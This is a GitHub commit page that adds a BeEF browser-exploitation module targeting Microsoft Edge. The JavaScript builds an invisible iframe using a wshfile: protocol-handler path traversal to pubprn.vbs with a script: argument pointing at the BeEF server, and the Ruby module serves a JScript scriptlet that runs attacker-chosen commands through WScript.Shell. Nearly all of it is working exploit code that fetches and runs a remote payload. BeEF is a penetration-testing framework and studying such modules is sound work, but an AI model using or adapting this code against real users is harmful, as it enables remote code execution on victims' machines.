-
Notifications
You must be signed in to change notification settings - Fork 2.1k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add Edge WScript WSH Injection module
- Loading branch information
Showing
3 changed files
with
111 additions
and
0 deletions.
There are no files selected for viewing
31 changes: 31 additions & 0 deletions
31
modules/social_engineering/edge_wscript_wsh_injection/command.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,31 @@ | ||
| // | ||
| // Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net | ||
| // Browser Exploitation Framework (BeEF) - http://beefproject.com | ||
| // See the file 'doc/COPYING' for copying permission | ||
| // | ||
|
|
||
| beef.execute(function(){ | ||
| var timeout = 5; | ||
|
|
||
| if (!beef.browser.isEdge()) { | ||
| beef.debug("[Edge WScript WSH Injection] Browser is not supported."); | ||
| beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser is not supported', beef.are.status_error()); | ||
| return; | ||
| } | ||
|
|
||
| try { | ||
| var wsh_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); | ||
| var beef_host = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port; | ||
| wsh_iframe_<%= @command_id %>.setAttribute('src', 'wshfile:test/../../../../../../../Windows/System32/Printing_Admin_Scripts/en-US/pubprn.vbs" 127.0.0.1 script:' + beef_host + '/<%= @command_id %>/index.html'); | ||
| } catch (e) { | ||
| beef.debug("[Edge WScript WSH Injection] Could not create iframe"); | ||
| beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Could not create iframe', beef.are.status_error()); | ||
| return; | ||
| } | ||
|
|
||
| // clean up | ||
| cleanup = function() { | ||
| document.body.removeChild(wsh_iframe_<%= @command_id %>); | ||
| } | ||
| setTimeout("cleanup()", timeout*1000); | ||
| }); |
20 changes: 20 additions & 0 deletions
20
modules/social_engineering/edge_wscript_wsh_injection/config.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,20 @@ | ||
| # | ||
| # Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net | ||
| # Browser Exploitation Framework (BeEF) - http://beefproject.com | ||
| # See the file 'doc/COPYING' for copying permission | ||
| # | ||
| beef: | ||
| module: | ||
| edge_wscript_wsh_injection: | ||
| enable: true | ||
| category: ["Social Engineering"] | ||
| name: "Edge WScript WSH Injection" | ||
| description: "Prompts the user to run \"Microsoft Windows Based Script Host\" (WScript.exe).<br/><br/>Uses <a href='https://leucosite.com/Microsoft-Edge-RCE/'>wshfile protocol handler</a> technique to load pubprn.vbs and <a href='https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'>WSH injection in pubprn.vbs</a> to execute arbitrary code.<br/><br/>If the user allows execution, a VBS payload is downloaded from BeEF, and the specified commands are executed." | ||
| authors: [ | ||
| "@qab", # wshfile protocol handler + traversal technique, and exploit | ||
| "@enigma0x3", # pubprn.vbs technique and exploit | ||
| "bcoles" # BeEF | ||
| ] | ||
| target: | ||
| user_notify: ["E"] | ||
| not_working: ["ALL"] |
60 changes: 60 additions & 0 deletions
60
modules/social_engineering/edge_wscript_wsh_injection/module.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,60 @@ | ||
| # | ||
| # Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net | ||
| # Browser Exploitation Framework (BeEF) - http://beefproject.com | ||
| # See the file 'doc/COPYING' for copying permission | ||
| # | ||
| class Edge_wscript_wsh_injection < BeEF::Core::Command | ||
|
|
||
| def pre_send | ||
| payload = '' | ||
| @datastore.each do |input| | ||
| if input['name'] == 'payload' | ||
| payload = input['value'] | ||
| end | ||
| end | ||
|
|
||
| rand_str = rand(32**10).to_s(32) | ||
|
|
||
| script = <<-EOF | ||
| <?XML version="1.0"?> | ||
| <scriptlet> | ||
| <registration | ||
| description="#{rand_str}" | ||
| progid="#{rand_str}" | ||
| version="1.00" | ||
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||
| remotable="true" | ||
| > | ||
| </registration> | ||
| <script language="JScript"> | ||
| <![CDATA[ | ||
| var r = new ActiveXObject("WScript.Shell").Run("#{payload.gsub('"', '\\"')}"); | ||
| ]]> | ||
| </script> | ||
| </scriptlet> | ||
| EOF | ||
|
|
||
| BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', | ||
| { | ||
| 'Content-Type' => 'text/html' | ||
| }, | ||
| script, | ||
| "/#{@command_id}/index.html", | ||
| -1 | ||
| ) | ||
| end | ||
|
|
||
| def self.options | ||
| return [ | ||
| {'name' => 'payload', 'ui_label' => 'Commands', 'value' => "calc.exe"} | ||
| ] | ||
| end | ||
|
|
||
| def post_execute | ||
| save({'result' => @datastore['result']}) | ||
| BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/#{@command_id}/index.html") | ||
| end | ||
| end |